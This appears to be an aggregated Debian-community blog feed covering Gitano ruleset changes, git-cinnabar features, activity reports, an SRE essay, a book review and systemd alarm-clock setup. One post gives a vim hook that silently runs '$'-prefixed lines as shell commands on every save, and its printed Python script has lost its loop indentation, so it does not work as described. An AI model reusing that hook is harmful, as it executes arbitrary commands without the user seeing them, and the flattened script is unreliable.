No more auto_user_XXX and auto_group_YYY As a result of the above being implemented, the support Gitano previously grew for automatically defining users and groups has been removed. The approach we took was pretty inflexible and risked compilation errors if a user was deleted or renamed, and so the sub-define approach is much much better. If you currently use auto_user_XXX or auto_group_YYY in your rulesets then your upgrade path isn't bumpless but it should be fairly simple:
  1. Upgrade your version of lace to 1.3
  2. Replace any auto_user_FOO with [user exact FOO] and similarly for any auto_group_BAR to [group exact BAR].
  3. You can now upgrade Gitano safely.

No more 'basic' matches Since Gitano first gained support for ACLs using Lace, we had a mechanism called 'simple match' for basic inputs such as groups, usernames, repo names, ref names, etc. Simple matches looked like user FOO or group !BAR. The match syntax grew more and more arcane as we added Lua pattern support refs ~^refs/heads/$ user /. When we wanted to add proper PCRE regex support we added a syntax of the form: user pcre ^/.+?... where pcre could be any of: exact, prefix, suffix, pattern, or pcre. We had a complex set of rules for exactly what the sigils at the start of the match string might mean in what order, and it was getting unwieldy. To simplify matters, none of the "backward compatibility" remains in Gitano. You instead MUST use the what how with match form. To make this slightly more natural to use, we have added a bunch of aliases: is for exact, starts and startswith for prefix, and ends and endswith for suffix. In addition, kind of match can be prefixed with a ! to invert it, and for natural looking rules not is an alias for !is. This means that your rulesets MUST be updated to support the more explicit syntax before you update Gitano, or else nothing will compile. Fortunately this form has been supported for a long time, so you can do this in three steps.
  1. Update your gitano-admin.git global ruleset. For example, the old form of the defines used to contain define is_gitano_ref ref ~^refs/gitano/ which can trivially be replaced with: define is_gitano_ref ref prefix refs/gitano/
  2. Update any non-zero rulesets your projects might have.
  3. You can now safely update Gitano
If you want a reference for making those changes, you can look at the Gitano skeleton ruleset which can be found at https://git.gitano.org.uk/gitano.git/tree/skel/gitano-admin/rules/ or in /usr/share/gitano if Gitano is installed on your local system. Next time, I'll likely talk about the deprecated commands which are no longer in Gitano, and how you'll need to adjust your automation to use the new commands.

1 April 2017

Mike Hommey: git-cinnabar experimental features

Since version 0.4.0, git-cinnabar has a few hidden experimental features. Two of them are available in 0.4.0, and a third was recently added on the master branch. The basic mechanism to enable experimental features is to set a preference in the git configuration with a comma-separated list of features to enable, or all, for all of them. That preference is cinnabar.experiments. Any means to set a git configuration can be used. You can: But what features are there? wire In order to talk to Mercurial repositories, git-cinnabar normally uses mercurial python modules. This experimental feature allows to access Mercurial repositories without using the mercurial python modules. It then relies on git-cinnabar-helper to connect to the repository through the mercurial wire protocol. As of version 0.4.0, the feature is automatically enabled when Mercurial is not installed. merge Git-cinnabar currently doesn t allow to push merge commits. The main reason for this is that generating the correct mercurial data for those merges is tricky, and needs to be gotten right. In version 0.4.0, enabling this feature allows to push merge commits as long as the parent commits are available on the mercurial repository. If they aren t, you need to first push them independently, and then push the merge. On current master, that limitation doesn t exist anymore ; you can just push everything in one go. The main caveat with this experimental support for pushing merges is that it currently doesn t handle the case where a file was moved on one of the branches the same way mercurial would (i.e. the information would be lost to mercurial users). clonebundles As of mercurial 3.6, Mercurial servers can opt-in to providing pre-generated bundles, which, when clients support it, takes CPU load off the server when a clone is performed. Good for servers, and usually good for clients too when they have a fast network connection, because downloading a pre-generated bundle is usually faster than waiting for the server to generate one. As of a few days ago, the master branch of git-cinnabar supports cloning using those pre-generated bundles, provided the server advertizes them (mozilla-central does).

2 February 2017

Paul Wise: FLOSS Activities January 2017

Changes

Issues

Review

Administration
  • Debian: reboot 1 non-responsive VM, redirect 2 users to support channels, redirect 1 contributor to xkb upstream, redirect 1 potential contributor, redirect 1 bug reporter to mirror team, ping 7 folks about restarting processes with upgraded libs, manually restart the sectracker process due to upgraded libs, restart the package tracker process due to upgraded libs, investigate failures connecting to the XMPP service, investigate /dev/shm issue on abel.d.o, clean up after rename of the fedmsg group.
  • Debian mentors: lintian/security updates & reboot
  • Debian packages: deploy 2 contributions to the live server
  • Debian wiki: unblacklist 1 IP address, whitelist 10 email addresses, disable 18 accounts with bouncing email, update email for 2 accounts with bouncing email, reported 1 Debian member as MIA, redirect 1 user to support channels, add 4 domains to the whitelist.
  • Reproducible builds: rescheduled Debian pyxplot:amd64/unstable for themill.
  • Openmoko: security updates & reboots.

Debian derivatives
  • Send the annual activity ping mail.
  • Happy new year messages on IRC, forward to the list.
  • Note that SerbianLinux does not provide source packages.
  • Expand URL shortener on SerbianLinux page.
  • Invite PelicanHPC, Netrunner, DietPi, Hamara Linux (on IRC), BitKey to the census.
  • Add research publications link to the census template
  • Fix Symbiosis sources.list
  • Enquired about SalentOS downtime
  • Fixed and removed some 404 BlankOn links (blog, English homepage)
  • Fixed changes to AstraLinux sources.list
  • Welcome Netrunner to the census

Sponsors I renewed my support of Software Freedom Conservancy. The openchange 1:2.2-6+deb8u1 upload was sponsored by my employer. All other work was done on a volunteer basis.

1 February 2017

Antoine Beaupr : My free software activities, January 2017

manpages.debian.org launched The debmans package I had so lovingly worked on last month is now officially abandoned. It turns out that another developer, Michael Stapelberg wrote his own implementation from scratch, called debiman. Both software share a similar design: they are both static site generators that parse an existing archive and call another tool to convert manpages into HTML. We even both settled on the same converter (mdoc). But while I wrote debmans in Python, debiman is written in Go. debiman also seems much faster, being written with concurrency in mind from the start. Finally, debiman is more feature complete: it properly deals with conflicting packages, localization and all sorts redirections. Heck, it even has a pretty logo, how can I compete? While debmans was written first and was in the process of being deployed, I had to give it up. It was a frustrating experience because I felt I wasted a lot of time working on software that ended up being discarded, especially because I put so much work on it, creating extensive documentation, an almost complete test suite and even filing a detailed core infrastructure best practices report In the end, I think that was the right choice: debiman seemed clearly superior and the best tool should win. Plus, it meant less work for me: Michael and Javier (the previous manpages.debian.org maintainer) did all the work of putting the site online. I also learned a lot about the CII best practices program, flask, click and, ultimately, the Go programming language itself, which I'll refer to as Golang for brievity. debiman definitely brought Golang into the spotlight for me. I had looked at Go before, but it seemed to be yet another language. But seeing Michael beat me to rebuilding the service really made me look at it again more seriously. While I really appreciate Python and I will probably still use it as my language of choice for GUI work and smaller scripts, but for daemons, network programs and servers, I will seriously consider Golang in the future. The site is now online at https://manpages.debian.org/. I even got credited in the about page which makes up for the disappointment.

Wallabako downloads Wallabag articles on my Kobo e-reader This obviously brings me to the latest project I worked on, Wallabako, my first Golang program ever. Wallabako is basically a client for the Wallabag application, which is a free software "read it later" service, an alternative to the likes of Pocket, Pinboard or Evernote. Back in April, I had looked downloading my "unread articles" into my new ebook reader, going through convoluted ways like implementing OPDS support into Wallabag, which turned out to be too difficult. Instead, I used this as an opportunity to learn Golang. After reading the quite readable golang specification over the weekend, I found the language to be quite elegant and simple, yet very powerful. Golang feels like C, but built with concurrency and memory (and to a certain extent, type) safety in mind, along with a novel approach to OO programming. The fact that everything can be compiled in one neat little static binary was also a key feature in selecting golang for this project, as I do not have much control over the platform my E-Reader is running: it is a Linux machine running under the ARM architecture, but beyond that, there isn't much available. I couldn't afford to ship a Python interpreter in there and while there are solutions there like pyinstaller, I felt that it may be so easy to deploy on ARM. The borg team had trouble building a ARM binary, restoring to tricks like building on a Raspberry PI or inside an emulator. In comparison, the native go compiler supports cross-compilation out of the box through a simple environment variable. So far Wallabako works amazingly well: when I "bag" a new article in Wallabag, either from my phone or my web browser, it will show up on my ebook reader then next time I open the wifi. I still need to "tap" the screen to fake the insertion of the USB cable, but we're working on automating that. I also need to make the installation of the software much easier and improve the documentation, because so far it's unlikely that someone unfamiliar with Kobo hardware hacking will be able to install it.

Other work According to Github, I filed a bunch of bugs all over the place (25 issues in 16 repositories), sent patches everywhere (13 pull requests in 6 repositories), and tried to fix everythin (created 38 commits in 7 repositories). Note that excludes most of my work, which happens on Gitlab. January was still a very busy month, especially considering I had an accident which kept me mostly offline for about a week. Here are some details on specific projects.

Stressant and a new computer I revived the stressant project and got a new computer. This is be covered in a separate article.

Linkchecker forked After much discussions, it was decided to fork the linkchecker project, which now lives in its own organization. I still have to write community guidelines and figure out the best way to maintain a stable branch, but I am hopeful that the community will pick up the project as multiple people volunteer to co-maintain the project. There has already been pull requests and issues reported, so that's a good sign.

Feed2tweet refresh I re-rolled my pull requests to the feed2tweet project: last time they were closed before I had time to rebase them. The author was okay with me re-submitting them, but he hasn't commented, reviewed or merged the patches yet so I am worried they will be dropped again. At that point, I would more likely rewrite this from scratch than try to collaborate with someone that is clearly not interested in doing so...

Debian uploads

Debian Long Term Support (LTS) This is my 10th month working on Debian LTS, started by Raphael Hertzog at Freexian. I took two months off last summer, which means it's actually been a year of work on the LTS project. This month I worked on a few issues, but they were big issues, so they took a lot of time. I have done a lot of work trying to backport the heading sanitization patches for CVE-2016-8743. The full report explain all the gritty details, but I ran out of time and couldn't upload the final version either. The issue mostly affects Apache servers in proxy configurations so it's not so severe as to warrant an immediate upload anyways. A lot of my time was spent battling the tiff package. The report mentions fixes for 15 CVEs and I uploaded the result in the DLA-795-1 advisory. I also worked on a small update to graphics magic for CVE-2016-9830 that is still pending because the issue is minor and we're waiting for more to pile up. See the full report for details. Finally, there was a small discussion surrounding tools to use when building and testing update to LTS packages. The resulting conversation was interesting, but it showed that we have a big documentation problem in the Debian project. There are a lot of tools, and the documentation is old and distributed everywhere. Every time I want to contribute something to the documentation, I never know where to start or go. This is why I wrote a separate debian development guide instead of contributing to existing documentation...

16 March 2016

Enrico Zini: Postprocessing files saved by vim

Processing vim buffers through an external program on save, is a technique that is probably in use, and that I have not found documented anywhere, so here we go. Skip to the details for the entertaining example. I wanted to integrate egt with TaskWarrior so that every time I am editing an egt project file in vim, if I write a line in a certain way then a new taskwarrior task is created. Also, I have never written a vim plugin, and I don't want to dive into another rabbit hole just yet. Lynoure brought to my attention that taskwiki processes things when the file is saved, so I thought that I can probably get a long way by piping the file from vim into egt and reading it back before saving. I created a new egt annotate command that reads a project file, tweaks it, and then prints it out; I opened a project file in vim; I typed :%!egt annotate %:p --stdin and saw that it could be done. I find the result quite fun: I type 15 March: 18:00-21:00 in a log in egt, save the file, and it becomes 15 March: 18:00-21:00 3h. I do something in TaskWarrior, save the file in egt, and the lines that are TaskWarrior tasks update with the new task states. Details Here's a step by step example of how to hook into vim in this way. First thing, create a filter script that processes text files in some way. Let's call this /usr/local/bin/pyvimshell:
#!/usr/bin/python3
import sys
import subprocess
for line in sys.stdin:
    print(line.rstrip(), file=sys.stdout)
line = line.strip()
if line == "$":
    pass
elif line.startswith("$"):
    out = subprocess.check_output(["sh", "-c", line[1:].strip()], universal_newlines=True)
    sys.stdout.write(out)
    if not out.endswith("\n"):
        sys.stdout.write("\n")
    print("$ ", file=sys.stdout)
Then let's create a new filetype in ~/.vim/filetype.vim for our special magic text files:
if exists("did_load_filetypes")
  finish
endif
augroup filetypedetect
  au! BufNewFile,BufRead *.term setf SillyShell
augroup END
If you create a file example.term, open it in vim and type :set ft it should say SillyShell. Finally, the hook in ~/.vim/after/ftplugin/SillyShell.vim:
function! SillyShellRun()
    :%!/home/enrico/dev/egt/pyvimshell
    :$
endfunction
autocmd BufWritePre,FileWritePre <buffer> :silent call SillyShellRun()
Now you can create a file example.term, open it in vim, type $ ls, save it, and suddenly you have a terminal with infinite scrollback. For egt, I actually want to preserve my cursor position across saves, and egt also needs to know the path to the project file, so here is the egt version of the hook:
function! EgtAnnotate()
    let l:cur_pos = getpos(".")
    :%!egt annotate --stdin %:p
    call setpos(".", l:cur_pos)
endfunction
autocmd BufWritePre,FileWritePre <buffer> :silent call EgtAnnotate()
I find this adorably dangerous. Have fun.

29 October 2015

Mart n Ferrari: Tales from the SRE trenches: SREs are not firefighters

This is the third part in a series of articles about SRE, based on the talk I gave in the Romanian Association for Better Software. If you haven't already, you might want to read part 1 and part 2 first. In this post, I talk about some strategies to avoid drowning SRE people in operational work.

SREs are not firefighters As I said before, it is very important that there is trust and respect between Dev and Ops. If Ops is seen as just an army of firefighters that will gladly put away fires at any time of the night, there are less incentives to make good software. Conversely, if Dev is shielded from the realities of the production environment, Ops will tend to think of them as delusional and untrustworthy.

Common staffing pool for SRE and SWE The first tool to combat this at Google -and possibly a difficult one to implement in small organisations- is to have single headcount budgets for Dev and Ops. That means that the more SREs you need to support your service, the less developers you have to write it. Combined with this, Google offers the possibility to SREs to move freely between teams, or even to transfer out to SWE. Because of this, a service that is painful to support will see the most senior SREs leaving and will only be able to afford less experienced hires. All this is a strong incentive to write good quality software, to work closely and to listen to the Ops people.

Share 5% of operational work with the SWE team On the other hand, it is necessary that developers see first hand how the service works in production, understand the problems, and share the pain of things failing. To this end, SWEs are expected to take on a small fraction of the operational work from SRE: handling tickets, being on-call, performing deployments, or managing capacity. This results in better communication among the teams and a common understanding of priorities.

Cap operational load at 50% One very uncommon rule from SRE at Google, is that SREs are not supposed to spend more than half of their time on "operational work". SREs are supposed to be spending their time on automation, monitoring, forecasting growth... Not on repeatedly fixing manually issues that stem from bad systems.

Excess operational work overflows to SWE If an SRE team is found to be spending too much time on operational work, that extra load is automatically reassigned to the development team, so SRE can keep doing their non-operational duties. On extreme cases, a service might be deemed too unstable to maintain, and SRE support is completely removed: it means the development team now has to carry pagers and do all the operational work themselves. It is a nuclear option, but the threat of it happening is a strong incentive to keep things sane.
The next post will be less about how to avoid unwanted work and more about the things that SRE actually do, and how these make things better. Comment

20 October 2015

Russ Allbery: Review: The Oathbound

Review: The Oathbound, by Mercedes Lackey
Series: Vows and Honor #1
Publisher: DAW
Copyright: July 1988
ISBN: 0-88677-414-4
Format: Mass market
Pages: 302
This book warrants a bit of explanation. Before Arrows of the Queen, before Valdemar (at least in terms of publication dates), came Tarma and Kethry short stories. I don't know if they were always intended to be set in the same world as Valdemar; if not, they were quickly included. But they came from another part of the world and a slightly different sub-genre. While the first two Valdemar trilogies were largely coming-of-age fantasy, Tarma and Kethry are itinerant sword-and-sorcery adventures featuring two women with a soul bond: the conventionally attractive, aristocratic mage Kethry, and the celibate, goddess-sworn swordswoman Tarma. Their first story was published, appropriately, in Marion Zimmer Bradley's Swords and Sorceress III. This is the first book about Tarma and Kethry. It's a fix-up novel: shorter stories, bridged and re-edited, and glued together with some additional material. And it does not contain the first Tarma and Kethry story. As mentioned in my earlier Valdemar reviews, this is a re-read, but it's been something like twenty years since I previously read the whole Valdemar corpus (as it was at the time; I'll probably re-read everything I have on hand, but it's grown considerably, and I may not chase down the rest of it). One of the things I'd forgotten is how oddly, from a novel reader's perspective, the Tarma and Kethry stories were collected. Knowing what I know now about publishing, I assume Swords and Sorceress III was still in print at the time The Oathbound was published, or the rights weren't available for some other reason, so their first story had to be omitted. Whatever the reason, The Oathbound starts with a jarring gap that's no less irritating in this re-read than it was originally. Also as is becoming typical for this series, I remembered a lot more world-building and character development than is actually present in at least this first book. In this case, I strongly suspect most of that characterization is in Oathbreakers, which I remember as being more of a coherent single story and less of a fix-up of puzzle and adventure stories with scant time for character growth. I'll be able to test my memory shortly. What we do get is Kethry's reconciliation of her past, a brief look at the Shin'a'in and the depth of Tarma and Kethry's mutual oath (unfortunately told more than shown), the introduction of Warrl (again, a relationship that will grow a great deal more depth later), and then some typical sword and sorcery episodes: a locked room mystery, a caravan guard adventure about which I'll have more to say later, and two rather unpleasant encounters with a demon. The material is bridged enough that it has a vague novel-like shape, but the bones of the underlying short stories are pretty obvious. One can tell this isn't really a novel even without the tell of a narrative recap in later chapters of events that you'd just read earlier in the same book. What we also get is rather a lot of rape, and one episode of seriously unpleasant "justice." A drawback of early Lackey is that her villains are pure evil. My not entirely trustworthy memory tells me that this moderates over time, but early stories tend to feature villains completely devoid of redeeming qualities. In this book alone one gets to choose between the rapist pedophile, the rapist lord, the rapist bandit, and the rapist demon who had been doing extensive research in Jack Chalker novels. You'll notice a theme. Most of the rape happens off camera, but I was still thoroughly sick of it by the end of the book. This was already a cliched motivation tactic when these stories were written. Worse, as with the end of Arrow's Flight, the protagonists don't seem to be above a bit of "turnabout is fair play." When you're dealing with rape as a primary plot motivation, that goes about as badly as you might expect. The final episode here involves a confrontation that Tarma and Kethry brought entirely on themselves through some rather despicable actions, and from which they should have taken a lesson about why civilized societies have criminal justice systems. Unfortunately, despite an ethical priest who is mostly played for mild amusement, no one in the book seems to have drawn that rather obvious conclusion. This, too, I recall as getting better as the series goes along and Lackey matures as a writer, but that only helps marginally with the early books. Some time after the publication of The Oathbound and Oathbreakers, something (presumably the rights situation) changed. Oathblood was published in 1998 and includes not only the first Tarma and Kethry story but also several of the short stories that make up this book, in (I assume) something closer to their original form. That makes The Oathbound somewhat pointless and entirely skippable. I re-read it first because that's how I first approached the series many years ago, and (to be honest) because I'd forgotten how much was reprinted in Oathblood. I'd advise a new reader to skip it entirely, start with the short stories in Oathblood, and then read Oathbreakers before reading the final novella. You'd miss the demon stories, but that's probably for the best. I'm complaining a lot about this book, but that's partly from familiarity. If you can stomach the rape and one stunningly unethical protagonist decision, the stories that make it up are solid and enjoyable, and the dynamic between Tarma and Kethry is always a lot of fun (and gets even better when Warrl is added to the mix). I think my favorite was the locked room mystery. It's significantly spoiled by knowing the ending, and it has little deeper significance, but it's a classic sort unembellished, unapologetic sword-and-sorcery tale that's hard to come by in books. But since it too is reprinted (in a better form) in Oathblood, there's no point in reading it here. Followed by Oathbreakers. Rating: 6 out of 10

16 April 2015

Andrew Shadura: Power button and logind

If you have configured your laptop s power button to act as sleep button using acpid, then installed systemd or systemd-shim and pressed the button only to find your laptop to shut down after it wakes up from sleep, set these options in /etc/systemd/logind.conf:
[Login]
HandlePowerKey=ignore
HandleSuspendKey=ignore
HandleHibernateKey=ignore
HandleLidSwitch=ignore

1 April 2015

Benjamin Mako Hill: More Community Data Science Workshops

Pictures from the CDSW sessions in Spring 2014Pictures from the CDSW sessions in Spring 2014
After two successful rounds in 2014, I m helping put on another round of the Community Data Science Workshops. Last year, our 40+ volunteer mentorss taught more than 150 absolute beginners the basics of programming in Python, data collection from web APIs, and tools for data analysis and visualization and we re still in the process of improving our curriculum and scaling up. Once again, the workshops will be totally free of charge and open to anybody. Once again, they will be possible through the generous participation of a small army of volunteer mentors. We ll be meeting for four sessions over three weekends: If you re interested in attending, or interested in volunteering as mentor, you can go to the information and registration page for the current round of workshops and sign up before April 3rd.

9 December 2014

Joey Hess: podcasts that don't suck, 2014 edition

Also, out of the podcasts I listed previously, I still listen to and enjoy Free As In Freedom, Off the Hook, and the Long Now Seminars. PS: A nice podcatcher, for the technically inclined is git-annex importfeed. Featuring list of feeds in a text file, and distributed podcatching!

26 October 2014

Joey Hess: a programmable alarm clock using systemd

I've taught my laptop to wake up at 7:30 in the morning. When it does, it will run whatever's in my ~/bin/goodmorning script. Then, if the lid is still closed, it will go back to sleep again. So, it's a programmable alarm clock that doesn't need the laptop to be left turned on to work. But it doesn't have to make noise and wake me up (I rarely want to be woken up by an alarm; the sun coming in the window is a much nicer method). It can handle other tasks like downloading my email, before I wake up. When I'm at home and on dialup, this tends to take an hour in the morning, so it's nice to let it happen before I get up. This took some time to figure out, but it's surprisingly simple. Besides ~/bin/goodmorning, which can be any program/script, I needed just two files to configure systemd to do this. /etc/systemd/system/goodmorning.timer
[Unit]
Description=good morning
[Timer]
Unit=goodmorning.service
OnCalendar=*-*-* 7:30
WakeSystem=true
Persistent=false
[Install]
WantedBy=multi-user.target
/etc/systemd/system/goodmorning.service
[Unit]
Description=good morning
RefuseManualStart=true
RefuseManualStop=true
ConditionACPower=true
[Service]
Type=oneshot
ExecStart=/bin/systemd-inhibit --what=handle-lid-switch --why=goodmorning /bin/su joey -c "/usr/bin/timeout 45m /home/joey/bin/goodmorning"
installation After installing those files, run (as root): systemctl enable goodmorning.timer; systemctl start goodmorning.timer Then, you'll also need to edit /etc/systemd/logind.conf, and set LidSwitchIgnoreInhibited=no -- this overrides the default, which is not to let systemd-inhibit block sleep on lid close. almost too easy I don't think this would be anywhere near as easy to do without systemd, logind, etc. Especially the handling of waking the system at the right time, and the behavior around lid sleep inhibiting. The WakeSystem=true relies on some hardware support for waking from sleep; my laptop supported it with no trouble but I don't know how broadly available that is. Also, notice the ConditionACPower=true, which I added once I realized I don't want the job to run if I forgot to leave the laptop plugged in overnight. Technically, it will still wake up when on battery power, but then it should go right back to sleep. Quite a lot of nice peices of systemd all working together here! xfce workaround If using xfce, xfce4-power-manager takes over handling of lid close from systemd, and currently prevents the system from going back to sleep if the lid is still closed when goodmorning finishes. Happily, there is an easy workaround; this configures xfce to not override the lid switch behavior: xfconf-query -c xfce4-power-manager -n -p /xfce4-power-manager/logind-handle-lid-switch -t bool -s true Other desktop environments may have similar issues. why not a per-user unit? It would perhaps be better to use the per-user systemd, not the system wide one. Then I could change the time the alarm runs without using root. What's prevented me from doing this is that systemd-inhibit uses policykit, and policykit prevents it from being used in this situation. It's a lot easier to run it as root and use su, than it is to reconfigure policykit.

19 October 2014

Benjamin Mako Hill: Another Round of Community Data Science Workshops in Seattle

Pictures from the CDSW sessions in Spring 2014Pictures from the CDSW sessions in Spring 2014
I am helping coordinate three and a half day-long workshops in November for anyone interested in learning how to use programming and data science tools to ask and answer questions about online communities like Wikipedia, free and open source software, Twitter, civic media, etc. This will be a new and improved version of the workshops run successfully earlier this year. The workshops are for people with no previous programming experience and will be free of charge and open to anyone. Our goal is that, after the three workshops, participants will be able to use data to produce numbers, hypothesis tests, tables, and graphical visualizations to answer questions like: If you are interested in participating, fill out our registration form here before October 30th. We were heavily oversubscribed last time so registering may help. If you already know how to program in Python, it would be really awesome if you would volunteer as a mentor! Being a mentor will involve working with participants and talking them through the challenges they encounter in programming. No special preparation is required. If you re interested, send me an email.

Next.